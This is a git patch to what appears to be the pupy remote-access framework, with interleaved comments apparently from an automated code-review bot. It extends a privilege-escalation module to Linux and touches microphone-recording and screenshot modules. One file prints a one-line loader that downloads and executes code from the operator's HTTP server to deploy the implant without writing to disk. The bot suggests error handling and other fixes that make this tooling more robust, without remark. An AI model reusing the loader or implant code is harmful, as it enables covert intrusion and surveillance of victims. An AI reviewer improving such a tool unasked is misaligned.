From d713be6c4a4d4896ee458ebdabacdb94beaffac2 Mon Sep 17 00:00:00 2001 From: AlessandroZ Date: Wed, 19 Sep 2018 18:04:00 +0200 Subject: [PATCH 1/2] adding beroot for linux --- pupy/external/BeRoot | 2 +- pupy/modules/beroot.py | 79 +++++++++++++++++------------ pupy/packages/linux/all/beroot | 1 + pupy/packages/windows/all/beRoot.py | 1 - pupy/packages/windows/all/beroot | 2 +- pupy/tox.ini | 2 +- 6 files changed, 51 insertions(+), 36 deletions(-) create mode 120000 pupy/packages/linux/all/beroot delete mode 120000 pupy/packages/windows/all/beRoot.py diff --git a/pupy/external/BeRoot b/pupy/external/BeRoot index 6a2c1c51..b5115909 160000 --- a/pupy/external/BeRoot +++ b/pupy/external/BeRoot @@ -1 +1 @@ -Subproject commit 6a2c1c51595f618980a5aa9aa23b8871b44bcbe6 +Subproject commit b511590985db57242bd1e84d2a23f018d050281f diff --git a/pupy/modules/beroot.py b/pupy/modules/beroot.py index f1e71ffd..b3312b66 100644 --- a/pupy/modules/beroot.py +++ b/pupy/modules/beroot.py @@ -2,15 +2,14 @@ from pupylib.PupyModule import config, PupyModule, PupyArgumentParser from pupylib.utils.rpyc_utils import redirected_stdio -from pupylib.PupyConfig import PupyConfig -from os import path -import datetime +from pupylib.utils.rpyc_utils import obtain __class_name__="Beroot" -@config(cat="admin", compat=["windows"]) + +@config(cat="admin", compat=["linux", "windows"]) class Beroot(PupyModule): - """ Windows Privilege escalation """ + """Check for privilege escalation path""" dependencies = { 'windows': [ 
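Review bot: The `compat` list on the `@config` decorator now includes "linux", but the `dependencies` dict whose opening is the last visible line of this hunk still shows only a `'windows'` key, and no later hunk in this patch touches it. If package loading for this module relies on that dict, a Linux client may not have the `beroot` package available when `run` calls `self.client.remote('beroot.run', 'run', False)`. Consider adding a `'linux': ['beroot']` entry next to the Windows one, or confirm that `client.remote` loads the package on demand. The dict continues outside the hunk, so this is inferred from the visible lines only.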
@@ -20,32 +19,36 @@ class Beroot(PupyModule): @classmethod def init_argparse(cls): - cls.arg_parser = PupyArgumentParser(prog="beroot", description=cls.__doc__) - cls.arg_parser.add_argument("-l", "--list", action="store_true", default=False, help="list all softwares installed (not run by default)") - cls.arg_parser.add_argument("-w", "--write", action="store_true", default=False, help="write output") - cls.arg_parser.add_argument("-c", "--cmd", action="store", default="whoami", help="cmd to execute for the webclient check (default: whoami)") + """ + Check the project on github: https://github.com/AlessandroZ/BeRoot + """ + header = '|====================================================================|\n' + header += '| |\n' + header += '| The BeRoot Project |\n' + header += '| |\n' + header += '| ! BANG BANG ! |\n' + header += '| |\n' + header += '|====================================================================|\n\n' + + cls.arg_parser = PupyArgumentParser(prog="beroot", description=header + cls.__doc__) + cls.arg_parser.add_argument("-c", "--cmd", action="store", default="whoami", help="Windows only: cmd to execute for the webclient check (default: whoami)") def run(self, args): - filepath = None - if args.write: - config = self.client.pupsrv.config or PupyConfig() - folder = config.get_folder('beroot', {'%c': self.client.short_name()}) - filepath = path.join(folder, str(datetime.datetime.now()).replace(" ","_").replace(":","-")+"-beroot.txt") - with redirected_stdio(self): - try: - for r in self.client.conn.modules["beRoot"].run(args.cmd, args.list, args.write): - self.print_output(output=r, write=args.write, file=filepath) - except Exception as e: - print e + run_beroot = self.client.remote('beroot.run', 'run', False) + if self.client.is_windows(): + results = obtain(run_beroot(args.cmd)) + for r in results: + self.windows_output(r) + else: + results = obtain(run_beroot()) + for r in results: + self.linux_output(level=r[0], msg=r[1]) - if args.write: - 
self.success(filepath) - - def print_output(self, output, write=False, file=None): - toPrint = True + def windows_output(self, output): + to_print = True if 'NotPrint' in output: - toPrint = False + to_print = False st = '\n-------------- %s --------------\n' % output['Category'] if 'list' in str(type(output['All'])): @@ -82,10 +85,22 @@ class Beroot(PupyModule): elif 'str' in str(type(output['All'])): st += output['All'] - if toPrint: - print st + if to_print: + self.log(st) - if write: - f = open(file, 'a') - f.write(st) - f.close() + + def linux_output(self, level='', msg=''): + if level == 'ok': + self.success(msg) + + elif level == 'error': + self.error(msg) + + elif level == 'info': + self.log('[!] {msg}'.format(msg=msg)) + + elif level == 'debug': + self.log('[?] {msg}'.format(msg=msg)) + + else: + self.log(msg) \ No newline at end of file diff --git a/pupy/packages/linux/all/beroot b/pupy/packages/linux/all/beroot new file mode 120000 index 00000000..95c068a7 --- /dev/null +++ b/pupy/packages/linux/all/beroot @@ -0,0 +1 @@ +../../../external/BeRoot/Linux/beroot/ \ No newline at end of file diff --git a/pupy/packages/windows/all/beRoot.py b/pupy/packages/windows/all/beRoot.py deleted file mode 120000 index 4fc5004d..00000000 --- a/pupy/packages/windows/all/beRoot.py +++ /dev/null @@ -1 +0,0 @@ -../../../external/BeRoot/BeRoot/beRoot.py \ No newline at end of file diff --git a/pupy/packages/windows/all/beroot b/pupy/packages/windows/all/beroot index 4ee699af..adcd3237 120000 --- a/pupy/packages/windows/all/beroot +++ b/pupy/packages/windows/all/beroot @@ -1 +1 @@ -../../../external/BeRoot/BeRoot/beroot \ No newline at end of file +../../../external/BeRoot/Windows/BeRoot/beroot/ \ No newline at end of file diff --git a/pupy/tox.ini b/pupy/tox.ini index e2c9ff94..ff9752f4 100644 --- a/pupy/tox.ini +++ b/pupy/tox.ini 
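Review bot: In `run`, the `try/except` that used to surround the remote call is gone, so a failure in `run_beroot(...)` or `obtain(...)` now propagates out of the module instead of being reported. The Linux branch also indexes `r[0]` and `r[1]` without checking the shape of what came back. The results are produced on the remote host and should be treated as untrusted input on the server side: report call failures through `self.error` and skip entries that are not two-element sequences. The `-l/--list` and `-w/--write` options are also removed without a mention in the commit message, so existing invocations that pass them will fail at argument parsing.

```python
    def run(self, args):
        run_beroot = self.client.remote('beroot.run', 'run', False)
        is_windows = self.client.is_windows()

        try:
            if is_windows:
                results = obtain(run_beroot(args.cmd))
            else:
                results = obtain(run_beroot())
        except Exception as e:
            self.error('beroot failed: {}'.format(e))
            return

        for r in results:
            if is_windows:
                self.windows_output(r)
            elif isinstance(r, (list, tuple)) and len(r) == 2:
                self.linux_output(level=r[0], msg=r[1])
            else:
                self.error('unexpected beroot result: {!r}'.format(r))
```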
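Review bot: `linux_output` has no docstring, and the level strings it dispatches on ('ok', 'error', 'info', 'debug') form an undocumented contract with the remote beroot package; an unrecognized level silently falls through to `self.log(msg)`. I would add a one-line docstring such as `"""Display one Linux finding; level is 'ok', 'error', 'info' or 'debug', anything else is logged unprefixed."""`. Since `msg` (and `st` in `windows_output`) originates on the remote host and is logged verbatim, it is worth confirming that `self.log` neutralizes terminal control characters before they reach the operator's console.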
@@ -51,7 +51,7 @@ exclude = packages/linux/all/lazagne packages/linux/all/laZagne.py packages/linux/all/mimipy.py + packages/linux/all/beroot packages/windows/all/beroot - packages/windows/all/beRoot.py packages/windows/all/lazagne packages/windows/all/laZagne.py From b35c6536c5c6c21e262f65794a8ab301dd253504 Mon Sep 17 00:00:00 2001 From: AlessandroZ Date: Thu, 20 Sep 2018 10:38:34 +0200 Subject: [PATCH 2/2] fix flake8 errors --- pupy/modules/beroot.py | 10 ++-------- pupy/modules/record_mic.py | 12 ++++++------ pupy/modules/screenshot.py | 4 ++-- pupy/pupylib/payloads/py_oneliner.py | 20 ++++++++++---------- 4 files changed, 20 insertions(+), 26 deletions(-) diff --git a/pupy/modules/beroot.py b/pupy/modules/beroot.py index b3312b66..55b29337 100644 --- a/pupy/modules/beroot.py +++ b/pupy/modules/beroot.py @@ -1,7 +1,6 @@ # -*- coding: utf-8 -*- from pupylib.PupyModule import config, PupyModule, PupyArgumentParser -from pupylib.utils.rpyc_utils import redirected_stdio from pupylib.utils.rpyc_utils import obtain __class_name__="Beroot" @@ -20,7 +19,7 @@ class Beroot(PupyModule): @classmethod def init_argparse(cls): """ - Check the project on github: https://github.com/AlessandroZ/BeRoot + Check the project on github: https://github.com/AlessandroZ/BeRoot """ header = '|====================================================================|\n' header += '| |\n' @@ -88,19 +87,14 @@ class Beroot(PupyModule): if to_print: self.log(st) - def linux_output(self, level='', msg=''): if level == 'ok': self.success(msg) - elif level == 'error': self.error(msg) - elif level == 'info': self.log('[!] {msg}'.format(msg=msg)) - elif level == 'debug': self.log('[?] {msg}'.format(msg=msg)) - else: - self.log(msg) \ No newline at end of file + self.log(msg) diff --git a/pupy/modules/record_mic.py b/pupy/modules/record_mic.py index 46ecd0aa..6191e852 100644 --- a/pupy/modules/record_mic.py +++ b/pupy/modules/record_mic.py 
@@ -45,27 +45,27 @@ class RecordMicrophoneModule(PupyModule): pass self.success("starting recording for %ss ..." % args.time) - + max_length = args.max_length if max_length is None: max_length = args.time if int(max_length) > int(args.time): raise PupyModuleError("--max-length argument cannot be bigger than --time") - + for sw, c, r, rf in self.client.conn.modules['mic_recorder'].record_iter(total=args.time, chunk=max_length): filepath = os.path.join("data","audio_records","mic_" + self.client.short_name() + "_" + str(datetime.datetime.now()).replace(" ","_").replace(":","-") + ".wav") save_wav(filepath, sw, c, r, rf) self.success("microphone recording saved to %s" % filepath) - + if args.view: viewer = self.client.pupsrv.config.get("default_viewers", "sound_player") - + found = False for p in os.environ.get('PATH', '').split(':'): if os.path.exists(os.path.join(p, viewer)): - subprocess.Popen([viewer,filepath]) + subprocess.Popen([viewer, filepath]) found = True break - if not found: + if not found: self.error('Default viewer not found: %s' % viewer) diff --git a/pupy/modules/screenshot.py b/pupy/modules/screenshot.py index 95f3418d..88f2e360 100644 --- a/pupy/modules/screenshot.py +++ b/pupy/modules/screenshot.py @@ -92,7 +92,7 @@ class Screenshoter(PupyModule): if args.view: viewer = config.get('default_viewers', 'image_viewer') - + found = False for p in os.environ.get('PATH', '').split(':'): if os.path.exists(os.path.join(p, viewer)): @@ -100,5 +100,5 @@ class Screenshoter(PupyModule): found = True break - if not found: + if not found: self.error('Default viewer not found: %s' % viewer) diff --git a/pupy/pupylib/payloads/py_oneliner.py b/pupy/pupylib/payloads/py_oneliner.py index a7bdf69f..01b6111e 100644 --- a/pupy/pupylib/payloads/py_oneliner.py +++ b/pupy/pupylib/payloads/py_oneliner.py 
@@ -83,18 +83,18 @@ def serve_payload(payload, ip="0.0.0.0", port=8080, link_ip=""): port+=1 else: raise - print colorize("[+] ","green") + "copy/paste this one-line loader to deploy pupy without writing on the disk :" - print " --- " + print(colorize("[+] ","green") + "copy/paste this one-line loader to deploy pupy without writing on the disk :") + print(" --- ") oneliner = colorize("python -c 'import urllib;exec urllib.urlopen(\"http://%s:%s/index\").read()'"%(link_ip, port), "green") - print oneliner - print " --- " - - print colorize("[+] ","green") + 'HTTP server started on {ip}:{port}'.format(ip=ip, port=port) - print colorize("[+] ","green") + 'CTCL+C to kill the server' - print colorize("[+] ","green") + 'Waiting for a connection ...' + print(oneliner) + print(" --- ") + + print(colorize("[+] ","green") + 'HTTP server started on {ip}:{port}'.format(ip=ip, port=port)) + print(colorize("[+] ","green") + 'CTCL+C to kill the server') + print(colorize("[+] ","green") + 'Waiting for a connection ...') server.serve_forever() - + except KeyboardInterrupt: - print colorize("[+] ","red") + 'KeyboardInterrupt received, shutting down the web server' + print(colorize("[+] ","red") + 'KeyboardInterrupt received, shutting down the web server') server.socket.close() server.shutdown()
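Review bot: The converted `print(...)` calls in `serve_payload` only behave like the function form because each one takes a single parenthesized expression; under Python 2 without `from __future__ import print_function`, a later `print(a, b)` would print a tuple. The import block and the start of `serve_payload` are outside this hunk, so if the file does not already have it I would add `from __future__ import print_function` at the top. The new line also carries over the typo 'CTCL+C', which should read `'CTRL+C to kill the server'`.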